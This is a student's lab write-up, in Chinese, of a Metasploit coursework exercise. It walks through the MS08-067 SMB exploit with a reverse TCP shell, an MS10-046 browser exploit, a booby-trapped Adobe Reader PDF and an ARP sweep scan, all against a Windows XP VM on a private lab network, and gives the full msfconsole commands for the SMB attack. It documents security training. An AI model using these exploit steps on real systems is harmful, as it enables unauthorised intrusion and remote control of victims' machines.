1. 程式人生 > >20154309 【網絡對抗技術】Exp5:MSF基礎應用

20154309 【網絡對抗技術】Exp5:MSF基礎應用

系統訪問 inux 安裝程序 執行 反彈連接 敏感信息 back 很難 其他

20154309 【網絡對抗技術】Exp5:MSF基礎應用

一、原理與實踐說明

1.實踐內容

本實踐目標是掌握metasploit的基本應用方式,掌握重點常用的三種攻擊方式的思路。具體需要完成:

· 一個主動攻擊實踐,如ms08-067; (1分)

· 一個針對瀏覽器的攻擊,如ms11-050;(1分)

· 一個針對客戶端的攻擊,如Adobe;(1分)

· 成功應用任何一個輔助模塊。(0.5分)

以上四個小實踐可不限於以上示例,並要求至少有一個是和其他所有同學不一樣的,否則扣除0.5分。

2.預備知識

一、MSF的六種模塊

· Exploit 模塊

  • 是利用發現的安全漏洞或配置弱點對遠程目標系統進行攻擊,以植入和運行攻擊載荷,從而獲得對遠程目標系統訪問權的代碼組件。
  • 形象點來說就是攻擊模塊

· Payload 模塊

  • 是在滲透成功後促使目標系統運行的一端植入代碼,通常作用是為滲透攻擊者打開在目標系統上的控制會話連接。實際上,該模塊就是計算機集成的針對不同操作系統實現shellcode攻擊的ruby代碼。

· Encoder 模塊

  • 針對payload進行編碼,可以通過多種編碼手段、多次編碼方式有效的改變payload代碼特征
  • 不改變payload作用,但能對payload進行加工

· Aux 模塊

  • 能夠幫助滲透測試中在進行滲透攻擊之前得到的目標系統豐富的情報信息,從而發起更具目標性的精準攻擊。
  • 主要包括針對各種網絡服務的掃描和查點、構建虛假服務收集登錄密碼、口令猜測破解、敏感信息嗅探、探查敏感信息泄露、Fuzz測試發掘漏洞、實施網絡協議欺騙等模塊。

· Post 模塊

  • 支持在滲透攻擊取得目標系統遠程控制權之後,在受控系統中進行給各樣的後滲透攻擊動作
  • 這裏主要指的是攻擊之後可能用到的模塊

· Nops 模塊

  • 是一些對程序運行狀態不會造成任何實質影響的空操作或無關操作指令,最典型的空指令就是空操作,在X86 CPU體系架構平臺上的操作碼是0x90
  • 因為有些代碼返回地址很難確認,所以在實際中有時候會填充一大段空指令,便於快速確定返回地址的位置

二、MSF常用漏洞利用命令

  • search name:用指定關鍵字搜索可以利用的漏洞模塊
  • use exploit name:使用漏洞
  • show options:顯示配置選項
  • set option name option:設置選項
  • show payloads:回鏈攻擊載荷
  • show targets 顯示目標(os版本)
  • set TARGET target number:設置目標版本
  • exploit:開始漏洞攻擊
  • sessions -l:列出會話
  • sessions -i id:選擇會話
  • sessions -k id:結束會話
  • Ctrl+z:把會話放到後臺
  • Ctrl+c:結束會話
  • show auxiliary:顯示輔助模塊
  • use auxiliary name :使用輔助模塊
  • set option name option:設置選項
  • exploit:運行模塊

3.基礎問題

  • 用自己的話解釋什麽是exploit , payload , encode
  • exploit : 對遠程目標機進行攻擊控制的攻擊模塊
  • payload : 攻擊者在目標系統上執行的一段攻擊代碼,該代碼具有反彈連接,創建用戶,執行其他系統命令的功能。
  • encode : encode編碼一是為了避免使攻擊載荷不能完整運行的“壞字符”,二是為了改變特征碼,幫助攻擊載荷避免被殺軟發現。

二、實踐過程

攻擊機:kali 靶機:winxp 的IP地址
技術分享圖片
技術分享圖片

1.Windows服務滲透攻擊——MS08-067安全漏洞

MS08-067漏洞將會影響除Windows Server 2008 Core以外的所有Windows系統,包括:Windows 2000/XP/Server 2003/Vista/Server 2008的各個版本,甚至還包括測試階段的Windows 7 Pro-Beta。

  • msf > use exploit/windows/smb/ms08_067_netapi
  • msf exploit(ms08_067_netapi) > show payloads
  • msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回連
  • msf exploit(ms08_067_netapi) > set LHOST 192.168.186.132 //攻擊機ip
  • msf exploit(ms08_067_netapi) > set LPORT 4309 //攻擊端口
  • msf exploit(ms08_067_netapi) > set RHOST 192.168.186.131 //靶機ip,特定漏洞端口已經固定
  • msf exploit(ms08_067_netapi) > set target 0 //自動選擇目標系統類型,匹配度較高
  • msf exploit(ms08_067_netapi) > exploit //攻擊
    技術分享圖片
    成功建立會話,攻擊成功。

2.瀏覽器滲透攻擊——MS10_046

這是一個遠程執行代碼漏洞。 成功利用此漏洞的攻擊者可以完全控制受影響的系統。 攻擊者可隨後安裝程序;查看、更改或刪除數據;或者創建擁有完全用戶權限的新帳戶。

search指令查找攻擊程序,選擇第一個,設置SRVHOST和LHOST等參數
技術分享圖片
運行,生成了一個URL,把這個URL復制到XP裏面,然後打開。
技術分享圖片
在XP瀏覽器中打開,出現以下界面:
技術分享圖片
Linux源源不斷接收信號
技術分享圖片
使用sessions指令查看當前存在的會話,可以看到存在一個ID為1的會話
技術分享圖片
使用sessions -i 1選擇會話1,成功獲取了靶機的shell,利用ipconfig指令查看靶機的IP地址:
技術分享圖片

3.針對Adobe Reader軟件的滲透攻擊——adobe_toolbutton

選擇use exploit/windows/fileformat/adobe_toolbutton,然後使用該模塊,設置回連的payload、相關地址、端口號以及生成文件名
技術分享圖片
顯示隱藏的文件,找到這個文件。
技術分享圖片

技術分享圖片
將文件復制到靶機XP上
技術分享圖片
在kali上輸入back退出當前模塊,進入監聽
技術分享圖片
在靶機上打開liuyanqing_2015439.pdf文件,攻擊機顯示攻擊成功
技術分享圖片

4.Metasploit輔助模塊之——信息收集模塊

使用show auxiliary查看可以運用的輔助模塊。
技術分享圖片
選擇信息收集模塊:掃描局域網有多少主機存活——使用discovery/arp_sweep模塊

msf > use auxiliary/scanner/discovery/arp_sweep (使用discovery/arp_sweep模塊)

  1. msf auxiliary(arp_sweep) > show options (查看選項)
  2. msf auxiliary(arp_sweep) > set RHOSTS 192.168.186.0/24(目標網段)
  3. msf auxiliary(arp_sweep) > set THREADS 10(線程)
  4. msf auxiliary(arp_sweep) > exploit(開始)

以下為對所在局域網進行掃描後的結果:
技術分享圖片

三、實踐總結及體會

通過本次實驗,了解了MSF基本組成原理和構成機理與相應模塊的應用。目前實驗的漏洞對相關的配置環境以及操作系統和軟件版本都有細致的要求,有一定的限制,很大一部分時間花費在配置環境上。
這是與真實實踐的差距之一。

20154309 【網絡對抗技術】Exp5:MSF基礎應用